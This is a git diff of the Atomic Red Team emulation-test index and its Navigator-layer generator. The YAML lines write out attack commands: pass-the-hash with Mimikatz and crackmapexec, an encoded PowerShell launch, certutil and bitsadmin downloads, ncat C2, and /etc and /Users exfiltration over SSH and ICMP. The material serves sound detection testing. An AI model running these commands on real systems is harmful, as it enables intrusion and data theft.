           Set-Content -Path #{script_path} -Value "#{command_to_execute}"
       executor:
         command: 'Start-Process #{script_path}
 
-'
+          '
         cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Writes text to a file and displays it.
       auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e
       description: 'Writes text to a file and display the results. This test is intended
         to emulate the dropping of a malicious file to disk.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -62345,17 +62345,17 @@ execution:
       executor:
         command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
 
-'
+          '
         cleanup_command: 'del "#{file_contents_path}"
 
-'
+          '
         name: command_prompt
     - name: Suspicious Execution via Windows Command Shell
       auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
       description: 'Command line executed via suspicious invocation. Example is from
         the 2021 Threat Detection Report by Red Canary.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -62446,7 +62446,7 @@ execution:
       executor:
         command: 'wmic useraccount get /ALL /format:csv
 
-'
+          '
         name: command_prompt
     - name: WMI Reconnaissance Processes
       auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
@@ -62458,7 +62458,7 @@ execution:
       executor:
         command: 'wmic process get caption,executablepath,commandline /format:csv
 
-'
+          '
         name: command_prompt
     - name: WMI Reconnaissance Software
       auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
@@ -62470,7 +62470,7 @@ execution:
       executor:
         command: 'wmic qfe get description,installedOn /format:csv
 
-'
+          '
         name: command_prompt
     - name: WMI Reconnaissance List Remote Services
       auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
@@ -62494,7 +62494,7 @@ execution:
       executor:
         command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
 
-'
+          '
         name: command_prompt
     - name: WMI Execute Local Process
       auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
@@ -62511,11 +62511,11 @@ execution:
       executor:
         command: 'wmic process call create #{process_to_execute}
 
-'
+          '
         cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete
           >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: WMI Execute Remote Process
       auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
@@ -62546,11 +62546,11 @@ execution:
         command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process
           call create #{process_to_execute}
 
-'
+          '
         cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}"
           process where name=''#{process_to_execute}'' delete >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Create a Process using WMI Query and an Encoded Command
       auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
@@ -62567,7 +62567,7 @@ execution:
       executor:
         command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
 
-'
+          '
         name: command_prompt
     - name: Create a Process using obfuscated Win32_Process
       auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
@@ -62880,7 +62880,7 @@ lateral-movement:
         command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
           $null, $null, "7")
 
-'
+          '
         name: powershell
   T1210:
     technique:
@@ -63133,7 +63133,7 @@ lateral-movement:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-'
+          '
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -63147,13 +63147,13 @@ lateral-movement:
         command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain}
           /ntlm:#{ntlm}"
 
-'
+          '
         name: command_prompt
     - name: crackmapexec Pass the Hash
       auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
       description: 'command execute with crackmapexec
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -63182,18 +63182,18 @@ lateral-movement:
       - description: 'CrackMapExec executor must exist on disk at specified location
           (#{crackmapexec_exe})
 
-'
+          '
         prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
 
-'
+          '
         get_prereq_command: 'Write-Host Automated installer not implemented yet, please
           install crackmapexec manually at this location: #{crackmapexec_exe}
 
-'
+          '
       executor:
         command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
 
-'
+          '
         name: command_prompt
   T1550.003:
     technique:
@@ -63272,7 +63272,7 @@ lateral-movement:
       auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098
       description: 'Similar to PTH, but attacking Kerberos
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -63292,10 +63292,10 @@ lateral-movement:
       dependencies:
       - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
 
-'
+          '
         prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
@@ -63384,7 +63384,7 @@ lateral-movement:
           net start sesshijack
         cleanup_command: 'sc.exe delete sesshijack >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1021.001:
@@ -63456,7 +63456,7 @@ lateral-movement:
       auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e
       description: 'Attempt an RDP session via Remote Desktop Application to a DomainController.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -63479,15 +63479,15 @@ lateral-movement:
       dependencies:
       - description: 'Computer must be domain joined
 
-'
+          '
         prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
           { exit 0} else { exit 1}
 
-'
+          '
         get_prereq_command: 'Write-Host Joining this computer to a domain must be
           done manually
 
-'
+          '
       executor:
         command: |
           $Server=#{logonserver}
@@ -63504,7 +63504,7 @@ lateral-movement:
       auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b
       description: 'Attempt an RDP session via Remote Desktop Application over Powershell
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -63769,7 +63769,7 @@ lateral-movement:
       auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3
       description: 'Connecting To Remote Shares
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -63793,13 +63793,13 @@ lateral-movement:
         command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password}
           /u:#{user_name}"
 
-'
+          '
         name: command_prompt
     - name: Map Admin Share PowerShell
       auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5
       description: 'Map Admin share utilizing PowerShell
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -63818,14 +63818,14 @@ lateral-movement:
       executor:
         command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
 
-'
+          '
         name: powershell
     - name: Copy and Execute File with PsExec
       auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf
       description: 'Copies a file to a remote host and executes it using PsExec. Requires
         the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -63846,10 +63846,10 @@ lateral-movement:
       - description: 'PsExec tool from Sysinternals must exist on disk at specified
           location (#{psexec_exe})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
 
-'
+          '
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
           Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -63879,7 +63879,7 @@ lateral-movement:
         command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file}
           2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1021.004:
@@ -64110,7 +64110,7 @@ lateral-movement:
       description: 'An adversary may use Radmin Viewer Utility to remotely control
         Windows device, this will start the radmin console.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -64126,10 +64126,10 @@ lateral-movement:
       - description: 'Radmin Viewer Utility must be installed at specified location
           (#{radmin_exe})
 
-'
+          '
         prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
 
-'
+          '
         get_prereq_command: |
           echo Downloading radmin installer
           bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
@@ -64422,7 +64422,7 @@ lateral-movement:
       executor:
         command: 'Enable-PSRemoting -Force
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Invoke-Command
@@ -64445,7 +64445,7 @@ lateral-movement:
       executor:
         command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
 
-'
+          '
         name: powershell
     - name: WinRM Access with Evil-WinRM
       auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
@@ -64805,7 +64805,7 @@ command-and-control:
           "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}"
           -QuickTimeout}
 
-'
+          '
         name: powershell
     - name: DNS Regular Beaconing
       auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
@@ -65603,7 +65603,7 @@ command-and-control:
       auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409
       description: 'Utilize rsync to perform a remote file copy (push)
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -65627,13 +65627,13 @@ command-and-control:
       executor:
         command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
 
-'
+          '
         name: bash
     - name: rsync remote file copy (pull)
       auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f
       description: 'Utilize rsync to perform a remote file copy (pull)
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -65657,13 +65657,13 @@ command-and-control:
       executor:
         command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
 
-'
+          '
         name: bash
     - name: scp remote file copy (push)
       auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344
       description: 'Utilize scp to perform a remote file copy (push)
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -65687,13 +65687,13 @@ command-and-control:
       executor:
         command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
 
-'
+          '
         name: bash
     - name: scp remote file copy (pull)
       auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33
       description: 'Utilize scp to perform a remote file copy (pull)
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -65717,13 +65717,13 @@ command-and-control:
       executor:
         command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
 
-'
+          '
         name: bash
     - name: sftp remote file copy (push)
       auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e
       description: 'Utilize sftp to perform a remote file copy (push)
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -65747,13 +65747,13 @@ command-and-control:
       executor:
         command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
 
-'
+          '
         name: bash
     - name: sftp remote file copy (pull)
       auto_generated_guid: '0139dba1-f391-405e-a4f5-f3989f2c88ef'
       description: 'Utilize sftp to perform a remote file copy (pull)
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -65777,14 +65777,14 @@ command-and-control:
       executor:
         command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
 
-'
+          '
         name: bash
     - name: certutil download (urlcache)
       auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
       description: 'Use certutil -urlcache argument to download a file from the web.
         Note - /urlcache also works!
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -65799,17 +65799,17 @@ command-and-control:
       executor:
         command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
 
-'
+          '
         cleanup_command: 'del #{local_path} >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: certutil download (verifyctl)
       auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b
       description: 'Use certutil -verifyctl argument to download a file from the web.
         Note - /verifyctl also works!
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -65831,7 +65831,7 @@ command-and-control:
         cleanup_command: 'Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force
           -Recurse -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Windows - BITSAdmin BITS Download
       auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
@@ -65857,7 +65857,7 @@ command-and-control:
         command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
           HIGH #{remote_file} #{local_path}
 
-'
+          '
         name: command_prompt
     - name: Windows - PowerShell Download
       auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
@@ -65879,17 +65879,17 @@ command-and-control:
         command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
           "#{destination_path}")
 
-'
+          '
         cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: OSTAP Worming Activity
       auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad
       description: 'OSTap copies itself in a specfic way to shares and secondary drives.
         This emulates the activity.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -65966,7 +65966,7 @@ command-and-control:
       auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
       description: 'Download a remote file using the whois utility
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -65994,29 +65994,29 @@ command-and-control:
       dependencies:
       - description: 'The whois and timeout commands must be present
 
-'
+          '
         prereq_command: 'which whois && which timeout
 
-'
+          '
         get_prereq_command: 'echo "Please install timeout and the whois package"
 
-'
+          '
       executor:
         name: sh
         elevation_required: false
         command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p
           #{remote_port} "#{query}" > #{output_file}
 
-'
+          '
         cleanup_command: 'rm -f #{output_file}
 
-'
+          '
     - name: File Download via PowerShell
       auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
       description: 'Use PowerShell to download and write an arbitrary file from the
         internet. Example is from the 2021 Threat Detection Report by Red Canary.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -66050,7 +66050,7 @@ command-and-control:
         name: command_prompt
         command: 'finger base64_filedata@#{remote_host}
 
-'
+          '
   T1090.001:
     technique:
       external_references:
@@ -66119,7 +66119,7 @@ command-and-control:
       executor:
         command: 'export #{proxy_scheme}_proxy=#{proxy_server}
 
-'
+          '
         cleanup_command: |
           unset http_proxy
           unset https_proxy
@@ -66508,10 +66508,10 @@ command-and-control:
       dependencies:
       - description: 'ncat.exe must be available at specified location (#{ncat_exe})
 
-'
+          '
         prereq_command: 'if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
@@ -66525,7 +66525,7 @@ command-and-control:
       executor:
         command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port}
 
-'
+          '
         name: powershell
     - name: Powercat C2
       auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
@@ -66674,13 +66674,13 @@ command-and-control:
       executor:
         command: 'Test-NetConnection -ComputerName #{domain} -port #{port}
 
-'
+          '
         name: powershell
     - name: Testing usage of uncommonly used port
       auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767
       description: 'Testing uncommonly used port utilizing telnet.
 
-'
+        '
       supported_platforms:
       - linux
       - macos
@@ -66696,7 +66696,7 @@ command-and-control:
       executor:
         command: 'telnet #{domain} #{port}
 
-'
+          '
         name: sh
   T1102.003:
     technique:
@@ -66938,7 +66938,7 @@ command-and-control:
           -Minimum 1 -Maximum 999999).#{domain}&type=#{query_type}" -UseBasicParsing).Content
           }
 
-'
+          '
         name: powershell
     - name: DNS over HTTPS Regular Beaconing
       auto_generated_guid: 0c5f9705-c575-42a6-9609-cbbff4b2fc9b
@@ -67128,7 +67128,7 @@ command-and-control:
         and using this to maintain access to the machine. Download of TeamViewer installer
         will be at the destination location when sucessfully executed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -67150,7 +67150,7 @@ command-and-control:
         and use to establish C2. Download of AnyDesk installer will be at the destination
         location and ran when sucessfully executed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -67169,7 +67169,7 @@ command-and-control:
         and use to establish C2. Download of LogMeIn installer will be at the destination
         location and ran when sucessfully executed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -67189,7 +67189,7 @@ command-and-control:
         and use to establish C2. Download of GoToAssist installer will be at the destination
         location and ran when sucessfully executed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -67258,7 +67258,7 @@ command-and-control:
       auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25
       description: 'Utilizing a common technique for posting base64 encoded data.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -67564,7 +67564,7 @@ command-and-control:
       - description: "Curl must be installed on system \n"
         prereq_command: 'if (Test-Path #{curl_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip
           Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl
@@ -67769,7 +67769,7 @@ exfiltration:
       auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a
       description: 'Take a file/directory, split it into 5Mb chunks
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -67788,12 +67788,12 @@ exfiltration:
         prereq_command: 'if [ ! -f #{folder_path}/#{file_name} ]; then exit 1; else
           exit 0; fi;
 
-'
+          '
         get_prereq_command: 'if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path};
           touch #{folder_path}/safe_to_delete; fi; dd if=/dev/urandom of=#{folder_path}/#{file_name}
           bs=25000000 count=1
 
-'
+          '
       executor:
         command: |
           cd #{folder_path}; split -b 5000000 #{file_name}
@@ -67801,7 +67801,7 @@ exfiltration:
         cleanup_command: 'if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path};
           fi;
 
-'
+          '
         name: sh
   T1048:
     technique:
@@ -67880,7 +67880,7 @@ exfiltration:
       executor:
         command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
 
-'
+          '
         name: sh
     - name: Exfiltration Over Alternative Protocol - SSH
       auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268
@@ -67910,7 +67910,7 @@ exfiltration:
         command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
           #{user_name}@#{domain} ''cat > /Users.tar.gz.enc''
 
-'
+          '
         name: sh
   T1048.002:
     technique:
@@ -68282,13 +68282,13 @@ exfiltration:
           in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}",
           1500, $Data) }
 
-'
+          '
         name: powershell
     - name: Exfiltration Over Alternative Protocol - DNS
       auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45
       description: 'Exfiltration of specified file over DNS protocol.
 
-'
+        '
       supported_platforms:
       - linux
       executor:
@@ -68333,7 +68333,7 @@ exfiltration:
         command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003
           Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
 
-'
+          '
         name: powershell
       input_arguments:
         input_file:
@@ -68946,16 +68946,16 @@ initial-access:
       description: 'The Adversaries can activate the default Guest user. The guest
         account is inactivated by default
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'net user guest /active:yes
 
-'
+          '
         cleanup_command: 'net user guest /active:no
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1078.002:
@@ -69269,7 +69269,7 @@ initial-access:
       description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension,
         please see "T1133\src\list of vpn extension.txt" to view complete list
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -69282,12 +69282,12 @@ initial-access:
           type: String
           default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
 
-'
+            '
       dependency_executor_name: powershell
       dependencies:
       - description: 'Chrome must be installed
 
-'
+          '
         prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
           -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
           {exit 0} else {exit 1}
@@ -69651,7 +69651,7 @@ initial-access:
         jse_path:
           description: 'Path for the macro to write out the "malicious" .jse file
 
-'
+            '
           type: String
           default: C:\Users\Public\art.jse
         ms_product:
@@ -69662,7 +69662,7 @@ initial-access:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -69673,7 +69673,7 @@ initial-access:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -69682,7 +69682,7 @@ initial-access:
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
 
-'
+          '
         name: powershell
   T1566.002:
     technique:
diff --git a/bin/generate-atomic-docs.rb b/bin/generate-atomic-docs.rb
index 3e4e0078..d6be5034 100755
--- a/bin/generate-atomic-docs.rb
+++ b/bin/generate-atomic-docs.rb
@@ -52,7 +52,16 @@ class AtomicRedTeamDocs
     generate_navigator_layer! "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json", \
       "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json", \
       "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json", \
-      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json"
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-saas.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json"
 
     return oks, fails
   end
@@ -200,12 +209,23 @@ class AtomicRedTeamDocs
   #
   # Generates a MITRE ATT&CK Navigator Layer based on contributed techniques
   #
-  def generate_navigator_layer!(output_layer_path, output_layer_path_win, output_layer_path_mac, output_layer_path_lin)
+  def generate_navigator_layer!(output_layer_path, output_layer_path_win, output_layer_path_mac, output_layer_path_lin, output_layer_path_iaas, \
+    output_layer_path_iaas_aws, output_layer_path_iaas_azure, output_layer_path_iaas_gcp, output_layer_path_containers, output_layer_path_saas, \
+    output_layer_path_google_workspace, output_layer_path_azure_ad, output_layer_path_office_365)
 
     techniques = []
     techniques_win = []
     techniques_mac = []
     techniques_lin = []
+    techniques_iaas = []
+    techniques_iaas_aws = []
+    techniques_iaas_azure = []
+    techniques_iaas_gcp = []
+    techniques_containers = []
+    techniques_saas = []
+    techniques_google_workspace = []
+    techniques_azure_ad = []
+    techniques_office_365 = []
 
     ATOMIC_RED_TEAM.atomic_tests.each do |atomic_yaml|
       begin
@@ -227,10 +247,28 @@ class AtomicRedTeamDocs
         has_windows_tests = false
         has_macos_tests = false
         has_linux_tests = false
+        has_iaas_tests = false
+        has_iaas_aws_tests = false
+        has_iaas_azure_tests = false
+        has_iaas_gcp_tests = false
+        has_containers_tests = false
+        has_saas_tests = false
+        has_google_workspace_tests = false
+        has_azure_ad_tests = false
+        has_office_365_tests = false
+
         atomic_yaml['atomic_tests'].each do |atomic|
           if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /windows/} then has_windows_tests = true end
           if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /macos/} then has_macos_tests = true end
           if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^(?!windows|macos).*$/} then has_linux_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas/} then has_iaas_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas:aws/} then has_iaas_aws_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas:azure/} then has_iaas_azure_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas:gcp/} then has_iaas_gcp_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^containers/} then has_containers_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^google-workspace/} then has_google_workspace_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^azure-ad/} then has_azure_ad_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^office-365/} then has_office_365_tests = true end
         end
         if has_windows_tests then
           techniques_win.push(technique)
@@ -244,6 +282,34 @@ class AtomicRedTeamDocs
           techniques_lin.push(technique)
           techniques_lin.push(techniqueParent) unless techniques_lin.include?(techniqueParent)
         end
+        if has_iaas_tests then
+          techniques_iaas.push(technique)
+          techniques_iaas.push(techniqueParent) unless techniques_iaas.include?(techniqueParent)
+        end
+        if has_iaas_azure_tests then
+          techniques_iaas_azure.push(technique)
+          techniques_iaas_azure.push(techniqueParent) unless techniques_iaas_azure.include?(techniqueParent)
+        end
+        if has_iaas_gcp_tests then
+          techniques_iaas_gcp.push(technique)
+          techniques_iaas_gcp.push(techniqueParent) unless techniques_iaas_gcp.include?(techniqueParent)
+        end
+        if has_containers_tests then
+          techniques_containers.push(technique)
+          techniques_containers.push(techniqueParent) unless techniques_containers.include?(techniqueParent)
+        end
+        if has_google_workspace_tests then
+          techniques_google_workspace.push(technique)
+          techniques_google_workspace.push(techniqueParent) unless techniques_google_workspace.include?(techniqueParent)
+        end
+        if has_azure_ad_tests then
+          techniques_azure_ad.push(technique)
+          techniques_azure_ad.push(techniqueParent) unless techniques_azure_ad.include?(techniqueParent)
+        end
+        if has_office_365_tests then
+          techniques_office_365.push(technique)
+          techniques_office_365.push(techniqueParent) unless techniques_office_365.include?(techniqueParent)
+        end
       end
     end
 
@@ -251,16 +317,41 @@ class AtomicRedTeamDocs
     layer_win = get_layer techniques_win, "Atomic Red Team (Windows)"
     layer_mac = get_layer techniques_mac, "Atomic Red Team (macOS)"
     layer_lin = get_layer techniques_lin, "Atomic Red Team (Linux)"
+    layer_iaas = get_layer techniques_iaas, "Atomic Red Team (Iaas)"
+    layer_iaas_aws = get_layer techniques_iaas_aws, "Atomic Red Team (Iaas:AWS)"
+    layer_iaas_azure = get_layer techniques_iaas_azure, "Atomic Red Team (Iaas:Azure)"
+    layer_iaas_gcp = get_layer techniques_iaas_gcp, "Atomic Red Team (Iaas:GCP)"
+    layer_containers = get_layer techniques_containers, "Atomic Red Team (Containers)"
+    layer_google_workspace = get_layer techniques_google_workspace, "Atomic Red Team (Google-Workspace)"
+    layer_azure_ad = get_layer techniques_azure_ad, "Atomic Red Team (Azure-AD)"
+    layer_office_365 = get_layer techniques_office_365, "Atomic Red Team (Office-365)"
+
 
     File.write output_layer_path,layer.to_json
     File.write output_layer_path_win,layer_win.to_json
     File.write output_layer_path_mac,layer_mac.to_json
     File.write output_layer_path_lin,layer_lin.to_json
+    File.write output_layer_path_iaas,layer_iaas.to_json
+    File.write output_layer_path_iaas_aws,layer_iaas_aws.to_json
+    File.write output_layer_path_iaas_azure,layer_iaas_azure.to_json
